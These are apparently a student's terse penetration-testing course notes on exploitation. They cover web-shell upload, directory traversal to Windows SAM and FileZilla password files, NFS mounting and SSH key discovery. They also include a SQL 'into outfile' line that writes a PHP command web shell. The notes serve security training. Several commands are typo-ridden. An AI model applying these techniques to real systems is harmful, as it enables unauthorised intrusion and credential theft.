< All Advanced Penetration Testing Notes

Nathanf | Advanced Penetration Testing | Module 7 - Exploitation

By: Nathanf | Related Course: Advanced Penetration Testing | Published: November 14, 2016 | Modified: November 14, 2016
Join Cybrary

Notepadexploit 1

cadaver, webDav

kali has pre built web shells in different languages


Step 1 – upload a file to server that executes code for you or allows you to execute code (webshell)

-upload a file that takes command injection via url query parameters


This can also be userd done via metasploit

-for reverse tcp  set exitOnSessionto false for options so it doesnt stop listening on first response


Notepadexploit 3

Directory traversal, Dump sam files to discover usernames and passwords

Directory traversal – can also be done from url

index?../../../../../bin.etc if it says save file weve found it otherwise we havent found it


Windows/repair/sam   – save file but you need syskey to access it  from



filezilla ftp

../../../../../xamp/FileZillaFtp/FileZilla server.xml congig filezilla file stores passwords

NotepadExploit 4


search metasploit for exploits

Notepadexploit 6

whoami   =  display which user you are

Notepadexploit 6

display network file system: in cli ->   showmount -e ’ip’



to export network filesystem

mount -t -o noclock nfs ’ip’ :/exportDir /exportlocation



hidden files ls -a

.ssh file store keys



Notepadexploitation 2

open web interface – phpmyadmin can use sql injection commands


creating a system command shell which accepts a parameter via url,  to sit on the server via sql 

run system command    ->

select ”<?php system($_GET[’cmd’]); ?” into outfile ”C:\\xamp\\htdocs\\shell.php”


\\ = escape, so you dont end up with a long file name on the system


at ftpd — daemon –bind-address ’ip’ /tmp

netstat antp

daemon = it will listen 


other shell -> powershell

tfpt = Tivial file transfer protocol

< All Advanced Penetration Testing Notes
Join Cybrary

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?